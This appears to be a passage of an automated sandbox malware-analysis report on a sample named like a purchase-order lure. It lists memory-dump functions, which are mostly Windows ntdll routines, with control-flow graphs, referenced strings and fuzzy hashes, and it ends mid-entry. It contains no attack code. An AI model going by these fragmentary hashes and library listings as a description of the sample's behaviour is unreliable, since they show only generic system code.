                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d78de77af51aee09d6c0cec674ccdd85bace3757e73f3582417216b723783ff
                                            • Instruction ID: 21cc67da996bef3d1729d8222ec6340f9128ef48f5c4b835820dc77076ede2ae
                                            • Opcode Fuzzy Hash: 7d78de77af51aee09d6c0cec674ccdd85bace3757e73f3582417216b723783ff
                                            • Instruction Fuzzy Hash: 8C90023160540806D1507158442474654054FD0305F55C522A0025614D8755CB9D76A2
                                            Function 34862BE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bc7c3395a79c2621407fed89e9aa3a6435ac5a8c8122a52ebcc76555656afc3
                                            • Instruction ID: e72dcf6370ff5aa395e80c9f487c0d8fbaf1c23ac248866581572aee086f4aaa
                                            • Opcode Fuzzy Hash: 9bc7c3395a79c2621407fed89e9aa3a6435ac5a8c8122a52ebcc76555656afc3
                                            • Instruction Fuzzy Hash: 6490023120544846D14071584414A4654154FD0309F55C522A0065654D9625CE9DB662
                                            Function 34862BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5b2f54ffd9dfded419d71a7499c177df7bb0fbd06b10c8fc2bc024d7c31095f
                                            • Instruction ID: c3d15e14230de5a9c1304e7b7a3075f1ad24be2abb22159ceafc8e33d6c0c6b1
                                            • Opcode Fuzzy Hash: f5b2f54ffd9dfded419d71a7499c177df7bb0fbd06b10c8fc2bc024d7c31095f
                                            • Instruction Fuzzy Hash: B690023120140806D1807158441464A54054FD1305F95C526A0026614DCA15CB9D77A2
                                            Function 34862C00 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                            • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                                            • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                            • Instruction Fuzzy Hash:
                                            Function 34862890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1127 34862890-348628b3 1128 3489a4bc-3489a4c0 1127->1128 1129 348628b9-348628cc 1127->1129 1128->1129 1132 3489a4c6-3489a4ca 1128->1132 1130 348628ce-348628d7 1129->1130 1131 348628dd-348628df 1129->1131 1130->1131 1133 3489a57e-3489a585 1130->1133 1134 348628e1-348628e5 1131->1134 1132->1129 1135 3489a4d0-3489a4d4 1132->1135 1133->1131 1137 348628eb-348628fa 1134->1137 1138 34862988-3486298e 1134->1138 1135->1129 1136 3489a4da-3489a4de 1135->1136 1136->1129 1139 3489a4e4-3489a4eb 1136->1139 1140 3489a58a-3489a58d 1137->1140 1141 34862900-34862905 1137->1141 1142 34862908-3486290c 1138->1142 1143 3489a4ed-3489a4f4 1139->1143 1144 3489a564-3489a56c 1139->1144 1140->1142 1141->1142 1142->1134 1145 3486290e-3486291b 1142->1145 1146 3489a50b 1143->1146 1147 3489a4f6-3489a4fe 1143->1147 1144->1129 1150 3489a572-3489a576 1144->1150 1148 34862921 1145->1148 1149 3489a592-3489a599 1145->1149 1152 3489a510-3489a536 call 34870050 1146->1152 1147->1129 1151 3489a504-3489a509 1147->1151 1153 34862924-34862926 1148->1153 1156 3489a5a1-3489a5c9 call 34870050 1149->1156 1150->1129 1154 3489a57c call 34870050 1150->1154 1151->1152 1168 3489a55d-3489a55f 1152->1168 1158 34862993-34862995 1153->1158 1159 34862928-3486292a 1153->1159 1154->1168 1158->1159 1163 34862997-348629b1 call 34870050 1158->1163 1164 34862946-34862966 call 34870050 1159->1164 1165 3486292c-3486292e 1159->1165 1177 34862969-34862974 1163->1177 1164->1177 1165->1164 1171 34862930-34862944 call 34870050 1165->1171 1174 34862981-34862985 1168->1174 1171->1164 1177->1153 1178 34862976-34862979 1177->1178 1178->1156 1179 3486297f 1178->1179 1179->1174
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 4f548447816520bd484a6c0b33bb0bfef53f57e7a789e9e7c42b1b1ca553ce3f
                                            • Instruction ID: 40fb19aec2832f33532432b440277771d8faae87765fff1879d815b010532c63
                                            • Opcode Fuzzy Hash: 4f548447816520bd484a6c0b33bb0bfef53f57e7a789e9e7c42b1b1ca553ce3f
                                            • Instruction Fuzzy Hash: 57512CB5B0065ABFE741EF98CC9097EF7B8BB442447508369E569D7641D73CDE008B90
                                            Function 348D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1180 348d2410-348d2433 1181 348d24ec-348d24ff 1180->1181 1182 348d2439-348d243d 1180->1182 1184 348d2501-348d250a 1181->1184 1185 348d2513-348d2515 1181->1185 1182->1181 1183 348d2443-348d2447 1182->1183 1183->1181 1186 348d244d-348d2451 1183->1186 1184->1185 1187 348d250c 1184->1187 1188 348d2517-348d251b 1185->1188 1186->1181 1189 348d2457-348d245b 1186->1189 1187->1185 1190 348d251d-348d252c 1188->1190 1191 348d2538-348d253e 1188->1191 1189->1181 1192 348d2461-348d2468 1189->1192 1193 348d252e-348d2536 1190->1193 1194 348d2540 1190->1194 1195 348d2543-348d2547 1191->1195 1196 348d246a-348d2471 1192->1196 1197 348d24b6-348d24be 1192->1197 1193->1195 1194->1195 1195->1188 1198 348d2549-348d2556 1195->1198 1199 348d2484 1196->1199 1200 348d2473-348d247b 1196->1200 1197->1181 1203 348d24c0-348d24c4 1197->1203 1201 348d2558-348d2562 1198->1201 1202 348d2564 1198->1202 1205 348d2489-348d24ab call 34870510 1199->1205 1200->1181 1204 348d247d-348d2482 1200->1204 1206 348d2567-348d2569 1201->1206 1202->1206 1203->1181 1207 348d24c6-348d24ea call 34870510 1203->1207 1204->1205 1218 348d24ae-348d24b1 1205->1218 1208 348d258d-348d258f 1206->1208 1209 348d256b-348d256d 1206->1209 1207->1218 1214 348d25ae-348d25d0 call 34870510 1208->1214 1215 348d2591-348d2593 1208->1215 1209->1208 1212 348d256f-348d258b call 34870510 1209->1212 1225 348d25d3-348d25df 1212->1225 1214->1225 1215->1214 1219 348d2595-348d25ab call 34870510 1215->1219 1224 348d2615-348d2619 1218->1224 1219->1214 1225->1206 1227 348d25e1-348d25e4 1225->1227 1228 348d25e6-348d2610 call 34870510 1227->1228 1229 348d2613 1227->1229 1228->1229 1229->1224
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 78dd98a9fe0e511f34feca68c7777fd8580c9c54ccd0662759dbc597a8bfd2cc
                                            • Instruction ID: a181ce2b18e8c10c2d3853a68c8ce56a4a650c7a1fabd5475b932efcdd9dc3fa
                                            • Opcode Fuzzy Hash: 78dd98a9fe0e511f34feca68c7777fd8580c9c54ccd0662759dbc597a8bfd2cc
                                            • Instruction Fuzzy Hash: AE512A75A00745AFEB20CF9CCD9097FBBF9EF4A240F40865AE4A5D7641EA74DA40CB60
                                            Function 348FA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1429 348fa670-348fa6e9 call 34832410 * 2 RtlDebugPrintTimes 1435 348fa89f-348fa8c4 call 348325b0 * 2 call 34864c30 1429->1435 1436 348fa6ef-348fa6fa 1429->1436 1438 348fa6fc-348fa709 1436->1438 1439 348fa724 1436->1439 1441 348fa70f-348fa715 1438->1441 1442 348fa70b-348fa70d 1438->1442 1443 348fa728-348fa734 1439->1443 1446 348fa71b-348fa722 1441->1446 1447 348fa7f3-348fa7f5 1441->1447 1442->1441 1444 348fa741-348fa743 1443->1444 1448 348fa736-348fa73c 1444->1448 1449 348fa745-348fa747 1444->1449 1446->1443 1450 348fa81f-348fa821 1447->1450 1452 348fa73e 1448->1452 1453 348fa74c-348fa750 1448->1453 1449->1450 1454 348fa827-348fa834 1450->1454 1455 348fa755-348fa77d RtlDebugPrintTimes 1450->1455 1452->1444 1457 348fa86c-348fa86e 1453->1457 1458 348fa85a-348fa866 1454->1458 1459 348fa836-348fa843 1454->1459 1455->1435 1467 348fa783-348fa7a0 RtlDebugPrintTimes 1455->1467 1457->1450 1464 348fa87b-348fa87d 1458->1464 1462 348fa84b-348fa851 1459->1462 1463 348fa845-348fa849 1459->1463 1468 348fa96b-348fa96d 1462->1468 1469 348fa857 1462->1469 1463->1462 1465 348fa87f-348fa881 1464->1465 1466 348fa870-348fa876 1464->1466 1472 348fa883-348fa889 1465->1472 1470 348fa878 1466->1470 1471 348fa8c7-348fa8cb 1466->1471 1467->1435 1477 348fa7a6-348fa7cc RtlDebugPrintTimes 1467->1477 1468->1472 1469->1458 1470->1464 1473 348fa99f-348fa9a1 1471->1473 1474 348fa88b-348fa89d RtlDebugPrintTimes 1472->1474 1475 348fa8d0-348fa8f4 RtlDebugPrintTimes 1472->1475 1474->1435 1475->1435 1480 348fa8f6-348fa913 RtlDebugPrintTimes 1475->1480 1477->1435 1482 348fa7d2-348fa7d4 1477->1482 1480->1435 1489 348fa915-348fa944 RtlDebugPrintTimes 1480->1489 1484 348fa7f7-348fa80a 1482->1484 1485 348fa7d6-348fa7e3 1482->1485 1488 348fa817-348fa819 1484->1488 1486 348fa7eb-348fa7f1 1485->1486 1487 348fa7e5-348fa7e9 1485->1487 1486->1447 1486->1484 1487->1486 1490 348fa80c-348fa812 1488->1490 1491 348fa81b-348fa81d 1488->1491 1489->1435 1495 348fa94a-348fa94c 1489->1495 1492 348fa868-348fa86a 1490->1492 1493 348fa814 1490->1493 1491->1450 1492->1457 1493->1488 1496 348fa94e-348fa95b 1495->1496 1497 348fa972-348fa985 1495->1497 1499 348fa95d-348fa961 1496->1499 1500 348fa963-348fa969 1496->1500 1498 348fa992-348fa994 1497->1498 1501 348fa987-348fa98d 1498->1501 1502 348fa996 1498->1502 1499->1500 1500->1468 1500->1497 1503 348fa98f 1501->1503 1504 348fa99b-348fa99d 1501->1504 1502->1465 1503->1498 1504->1473
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: HEAP:
                                            • API String ID: 3446177414-2466845122
                                            • Opcode ID: bc3ec7339f4cb4f8b896ec0852f33d7b40948cbff67bf718776bab58e93062df
                                            • Instruction ID: 535895c336147b372ae0a036f8f4937a964acc94d319947f00ee5e2c35933687
                                            • Opcode Fuzzy Hash: bc3ec7339f4cb4f8b896ec0852f33d7b40948cbff67bf718776bab58e93062df
                                            • Instruction Fuzzy Hash: 48A1CE75B143018FE705CE18D890A5AB7E9FF88B60F444A2DE946DB310EB71EC46CB91
                                            Function 34857630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1505 34857630-34857651 1506 34857653-3485766f call 3482e660 1505->1506 1507 3485768b-34857699 call 34864c30 1505->1507 1512 34857675-34857682 1506->1512 1513 34894638 1506->1513 1514 34857684 1512->1514 1515 3485769a-348576a9 call 34857818 1512->1515 1517 3489463f-34894645 1513->1517 1514->1507 1521 34857701-3485770a 1515->1521 1522 348576ab-348576c1 call 348577cd 1515->1522 1519 348576c7-348576d0 call 34857728 1517->1519 1520 3489464b-348946b8 call 348af290 call 34869020 RtlDebugPrintTimes BaseQueryModuleData 1517->1520 1519->1521 1530 348576d2 1519->1530 1520->1519 1539 348946be-348946c6 1520->1539 1525 348576d8-348576e1 1521->1525 1522->1517 1522->1519 1532 348576e3-348576f2 call 3485771b 1525->1532 1533 3485770c-3485770e 1525->1533 1530->1525 1534 348576f4-348576f6 1532->1534 1533->1534 1537 34857710-34857719 1534->1537 1538 348576f8-348576fa 1534->1538 1537->1538 1538->1514 1541 348576fc 1538->1541 1539->1519 1542 348946cc-348946d3 1539->1542 1544 348947be-348947d0 call 34862c50 1541->1544 1542->1519 1543 348946d9-348946e4 1542->1543 1545 348947b9 call 34864d48 1543->1545 1546 348946ea-34894723 call 348af290 call 3486aaa0 1543->1546 1544->1514 1545->1544 1554 3489473b-3489476b call 348af290 1546->1554 1555 34894725-34894736 call 348af290 1546->1555 1554->1519 1560 34894771-3489477f call 3486a770 1554->1560 1555->1521 1563 34894781-34894783 1560->1563 1564 34894786-348947a3 call 348af290 call 3489cf9e 1560->1564 1563->1564 1564->1519 1569 348947a9-348947b2 1564->1569 1569->1560 1570 348947b4 1569->1570 1570->1519
                                            Strings
                                            • ExecuteOptions, xrefs: 348946A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34894725
                                            • Execute=1, xrefs: 34894713
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34894655
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 34894787
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 348946FC
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 34894742
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 7fdd0a4e2eac6c5b6ef5d5f451ddfa92d48ca717d5eb1034daab791ced2c11b7
                                            • Instruction ID: f727168b136349ee6a97467b5ecc55d5e1c7ef4cb23c6c2e3611f91d63fdc4ff
                                            • Opcode Fuzzy Hash: 7fdd0a4e2eac6c5b6ef5d5f451ddfa92d48ca717d5eb1034daab791ced2c11b7
                                            • Instruction Fuzzy Hash: 6451177560021DBFFB10AAA8DC85FE977ECEF08344F4042D9E615A71A0EBB19A45CF51
                                            Function 3483A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 34887AE6
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348879D5
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 348879D0, 348879F5
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 348879FA
                                            • SsHd, xrefs: 3483A3E4
                                            • Actx , xrefs: 34887A0C, 34887A73
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                            • API String ID: 0-1988757188
                                            • Opcode ID: 1ef7b287b5be2e9b72d3a87acb65bed648b19a7a85043ab59f4e52e29a58b41a
                                            • Instruction ID: c368a638488c6bbf17e1dcc4ada1904e0519298e9e715d0d0ad3024a804e8888
                                            • Opcode Fuzzy Hash: 1ef7b287b5be2e9b72d3a87acb65bed648b19a7a85043ab59f4e52e29a58b41a
                                            • Instruction Fuzzy Hash: E7E1B1796093018FE715CF28C884B9AB7E5FB85364F504B2DE865CB290EB31D985CBC1
                                            Function 3483D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34889565
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34889346
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 34889341, 34889366
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 3488936B
                                            • Actx , xrefs: 34889508
                                            • GsHd, xrefs: 3483D874
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                            • API String ID: 3446177414-2196497285
                                            • Opcode ID: bf4431783141b81fc0b598c01ad728e81cf17ad79de5b682079f589909fb674c
                                            • Instruction ID: 1585f8deca1b6d3bda8966c38930f751589fd755d4f48f6288ff7716d615127b
                                            • Opcode Fuzzy Hash: bf4431783141b81fc0b598c01ad728e81cf17ad79de5b682079f589909fb674c
                                            • Instruction Fuzzy Hash: 17E17978609306CFE711CF68C880B5AB7E4BB8835CF404B6DE8959B291D771E949CF92
                                            Function 3481645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3481656C
                                              • Part of subcall function 348165B5: RtlDebugPrintTimes.NTDLL ref: 34816664
                                              • Part of subcall function 348165B5: RtlDebugPrintTimes.NTDLL ref: 348166AF
                                            Strings
                                            • LdrpInitShimEngine, xrefs: 348799F4, 34879A07, 34879A30
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34879A01
                                            • apphelp.dll, xrefs: 34816496
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 348799ED
                                            • minkernel\ntdll\ldrinit.c, xrefs: 34879A11, 34879A3A
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 34879A2A
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-204845295
                                            • Opcode ID: bf5dbb9a79e2b6710f6ecbd4fb945cebb4f611c6a57e10e02da9cc5ee3924bf7
                                            • Instruction ID: 95aab023302acbca924c82ded46c296d3a06e3c2ea48480c726d3c86c455a341
                                            • Opcode Fuzzy Hash: bf5dbb9a79e2b6710f6ecbd4fb945cebb4f611c6a57e10e02da9cc5ee3924bf7
                                            • Instruction Fuzzy Hash: E9518171219304DFF321CF24C850E9BBBE9EF88754F404A1EE595A7260DA70D985CF96
                                            Function 3489FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                            • API String ID: 3446177414-4227709934
                                            • Opcode ID: b7f610cbb87afb12d8a1fa70b14b1ff7fadee67617dd1a38bdccc9bd9722c9e4
                                            • Instruction ID: 90a0e507da81c3c7b22d6c9159805262e55eba2fef47233eebde1b9c81220c6d
                                            • Opcode Fuzzy Hash: b7f610cbb87afb12d8a1fa70b14b1ff7fadee67617dd1a38bdccc9bd9722c9e4
                                            • Instruction Fuzzy Hash: DF415AB9E0060AAFEB05DF99C980ADEBBF5FF48354F104259EA04AB341D7719951CBA0
                                            Function 348165B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34879AF6
                                            • LdrpLoadShimEngine, xrefs: 34879ABB, 34879AFC
                                            • minkernel\ntdll\ldrinit.c, xrefs: 34879AC5, 34879B06
                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34879AB4
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-3589223738
                                            • Opcode ID: a7d2fe43c53c46088fc6250cc5c2e53adba72f6787248438ca31ad1fb172163b
                                            • Instruction ID: 94c15d8b8889a6126de03debe120e52d653199684b949fa621d465b33ac79379
                                            • Opcode Fuzzy Hash: a7d2fe43c53c46088fc6250cc5c2e53adba72f6787248438ca31ad1fb172163b
                                            • Instruction Fuzzy Hash: BF51F176A003589FFB14DB6CCC54E9D7BB6EB48314F04036AE461BB2A5DBB09C42CB94
                                            Function 3484DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
